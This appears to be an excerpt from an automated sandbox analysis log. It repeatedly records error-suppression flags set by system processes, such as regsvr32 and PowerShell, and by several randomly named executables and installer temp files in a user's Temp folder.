Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process information set: NOOPENFILEERRORBOX
